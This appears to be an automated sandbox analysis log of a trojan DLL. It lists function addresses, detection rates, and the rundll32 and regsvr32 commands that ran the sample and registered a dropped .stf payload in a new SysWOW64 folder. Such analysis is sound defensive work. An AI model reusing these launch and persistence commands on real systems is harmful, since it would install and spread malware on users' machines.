File created: C:\Windows\SysWOW64\Hlykwbcwowuykza\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10021091	0_2_10021091
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10030140	0_2_10030140
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10022164	0_2_10022164
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10020220	0_2_10020220
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002D49C	0_2_1002D49C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10024556	0_2_10024556
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10021564	0_2_10021564
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C578	0_2_1000C578
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10030682	0_2_10030682
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10021938	0_2_10021938
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10028B9A	0_2_10028B9A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002FBFE	0_2_1002FBFE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10026C81	0_2_10026C81
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10030D46	0_2_10030D46
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10021D44	0_2_10021D44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10031E11	0_2_10031E11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021091	2_2_10021091
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10030140	2_2_10030140
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10022164	2_2_10022164
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10020220	2_2_10020220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002D49C	2_2_1002D49C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10024556	2_2_10024556
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021564	2_2_10021564
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000C578	2_2_1000C578
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10030682	2_2_10030682
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021938	2_2_10021938
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10028B9A	2_2_10028B9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002FBFE	2_2_1002FBFE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10026C81	2_2_10026C81
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10030D46	2_2_10030D46
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021D44	2_2_10021D44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10031E11	2_2_10031E11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021091	3_2_10021091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10030140	3_2_10030140
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10022164	3_2_10022164
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10020220	3_2_10020220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002D49C	3_2_1002D49C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10024556	3_2_10024556
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021564	3_2_10021564
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000C578	3_2_1000C578
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10030682	3_2_10030682
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021938	3_2_10021938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10028B9A	3_2_10028B9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002FBFE	3_2_1002FBFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10026C81	3_2_10026C81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10030D46	3_2_10030D46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021D44	3_2_10021D44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10031E11	3_2_10031E11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04859587	3_2_04859587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048685A7	3_2_048685A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485E51F	3_2_0485E51F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048556AD	3_2_048556AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486202D	3_2_0486202D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485C26D	3_2_0485C26D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486DC5F	3_2_0486DC5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04856C5E	3_2_04856C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04859DE0	3_2_04859DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04867EB9	3_2_04867EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04863EE6	3_2_04863EE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486E4B2	3_2_0486E4B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048554B9	3_2_048554B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048624F9	3_2_048624F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486B45C	3_2_0486B45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048675AD	3_2_048675AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485D5D6	3_2_0485D5D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485A528	3_2_0485A528
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04870559	3_2_04870559
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04865689	3_2_04865689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486169D	3_2_0486169D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486D6A7	3_2_0486D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048586ED	3_2_048586ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485260B	3_2_0485260B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04864658	3_2_04864658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485A7C4	3_2_0485A7C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486F7FE	3_2_0486F7FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048537FA	3_2_048537FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485B704	3_2_0485B704
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04863711	3_2_04863711
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486E71C	3_2_0486E71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04864093	3_2_04864093
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486B0A4	3_2_0486B0A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486A0F3	3_2_0486A0F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048660FA	3_2_048660FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486001B	3_2_0486001B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04853023	3_2_04853023
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486F05E	3_2_0486F05E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048601BF	3_2_048601BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048591D6	3_2_048591D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486E10C	3_2_0486E10C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048542B2	3_2_048542B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048632C5	3_2_048632C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485A203	3_2_0485A203
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485E214	3_2_0485E214
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486C234	3_2_0486C234
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048653D5	3_2_048653D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486630A	3_2_0486630A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486FC6F	3_2_0486FC6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04855D99	3_2_04855D99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04858DA4	3_2_04858DA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486BDB0	3_2_0486BDB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04861DCF	3_2_04861DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04864D2B	3_2_04864D2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04865D5E	3_2_04865D5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04851D5C	3_2_04851D5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04868D6C	3_2_04868D6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485CED3	3_2_0485CED3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04852EF6	3_2_04852EF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486FFAC	3_2_0486FFAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04868FB0	3_2_04868FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04862FB9	3_2_04862FB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04853FE5	3_2_04853FE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486BF4C	3_2_0486BF4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04860F57	3_2_04860F57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04866F79	3_2_04866F79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485F88D	3_2_0485F88D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485D8E0	3_2_0485D8E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486D8FE	3_2_0486D8FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486481A	3_2_0486481A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048519C8	3_2_048519C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485A9D2	3_2_0485A9D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048659FA	3_2_048659FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04867915	3_2_04867915
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485593C	3_2_0485593C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486E947	3_2_0486E947
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485E942	3_2_0485E942
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04854A11	3_2_04854A11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486BA7C	3_2_0486BA7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485DB9B	3_2_0485DB9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485FBDD	3_2_0485FBDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04859BDE	3_2_04859BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0486CBE5	3_2_0486CBE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04863B17	3_2_04863B17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485BB44	3_2_0485BB44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE3EE6	4_2_04CE3EE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD56AD	4_2_04CD56AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE7EB9	4_2_04CE7EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEDC5F	4_2_04CEDC5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD6C5E	4_2_04CD6C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDC26D	4_2_04CDC26D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEFC6F	4_2_04CEFC6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE202D	4_2_04CE202D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD9DE0	4_2_04CD9DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD9587	4_2_04CD9587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE85A7	4_2_04CE85A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDE51F	4_2_04CDE51F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE32C5	4_2_04CE32C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDCED3	4_2_04CDCED3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD86ED	4_2_04CD86ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDD8E0	4_2_04CDD8E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CED8FE	4_2_04CED8FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE60FA	4_2_04CE60FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE24F9	4_2_04CE24F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD2EF6	4_2_04CD2EF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEA0F3	4_2_04CEA0F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDF88D	4_2_04CDF88D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE5689	4_2_04CE5689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE169D	4_2_04CE169D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE4093	4_2_04CE4093
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CED6A7	4_2_04CED6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEB0A4	4_2_04CEB0A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD54B9	4_2_04CD54B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEE4B2	4_2_04CEE4B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD42B2	4_2_04CD42B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEF05E	4_2_04CEF05E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEB45C	4_2_04CEB45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE4658	4_2_04CE4658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEBA7C	4_2_04CEBA7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD260B	4_2_04CD260B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDA203	4_2_04CDA203
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE481A	4_2_04CE481A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE001B	4_2_04CE001B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDE214	4_2_04CDE214
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD4A11	4_2_04CD4A11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD3023	4_2_04CD3023
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEC234	4_2_04CEC234
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE1DCF	4_2_04CE1DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD19C8	4_2_04CD19C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDA7C4	4_2_04CDA7C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDFBDD	4_2_04CDFBDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD9BDE	4_2_04CD9BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDD5D6	4_2_04CDD5D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD91D6	4_2_04CD91D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE53D5	4_2_04CE53D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDA9D2	4_2_04CDA9D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD3FE5	4_2_04CD3FE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CECBE5	4_2_04CECBE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEF7FE	4_2_04CEF7FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE59FA	4_2_04CE59FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD37FA	4_2_04CD37FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD5D99	4_2_04CD5D99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDDB9B	4_2_04CDDB9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEFFAC	4_2_04CEFFAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE75AD	4_2_04CE75AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD8DA4	4_2_04CD8DA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE01BF	4_2_04CE01BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE2FB9	4_2_04CE2FB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEBDB0	4_2_04CEBDB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE8FB0	4_2_04CE8FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEBF4C	4_2_04CEBF4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEE947	4_2_04CEE947
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDBB44	4_2_04CDBB44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDE942	4_2_04CDE942
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE5D5E	4_2_04CE5D5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD1D5C	4_2_04CD1D5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CF0559	4_2_04CF0559
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE0F57	4_2_04CE0F57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE8D6C	4_2_04CE8D6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE6F79	4_2_04CE6F79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEE10C	4_2_04CEE10C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE630A	4_2_04CE630A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDB704	4_2_04CDB704
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CEE71C	4_2_04CEE71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE3B17	4_2_04CE3B17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE7915	4_2_04CE7915
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE3711	4_2_04CE3711
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CDA528	4_2_04CDA528
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CE4D2B	4_2_04CE4D2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD593C	4_2_04CD593C

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 1001FBC4 appears 142 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 1001FBF7 appears 39 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 10022714 appears 51 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 10004D7A appears 33 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1001FBC4 appears 143 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1001FBF7 appears 39 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10022714 appears 51 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10004D7A appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001FBC4 appears 143 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001FBF7 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10022714 appears 51 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10004D7A appears 33 times

Source: FC6cLk6kKz.dll

Binary or memory string: OriginalFilenameBaseDLG_MFC.EXEN vs FC6cLk6kKz.dll

Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FC6cLk6kKz.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior

Source: FC6cLk6kKz.dll	Virustotal: Detection: 64%
Source: FC6cLk6kKz.dll	ReversingLabs: Detection: 67%

Source: FC6cLk6kKz.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\FC6cLk6kKz.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FC6cLk6kKz.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -s W32Time
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\FC6cLk6kKz.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FC6cLk6kKz.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@27/8@2/60

Source: C:\Windows\System32\loaddll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:6140:120:WilError_01

Source: C:\Windows\System32\loaddll32.exe

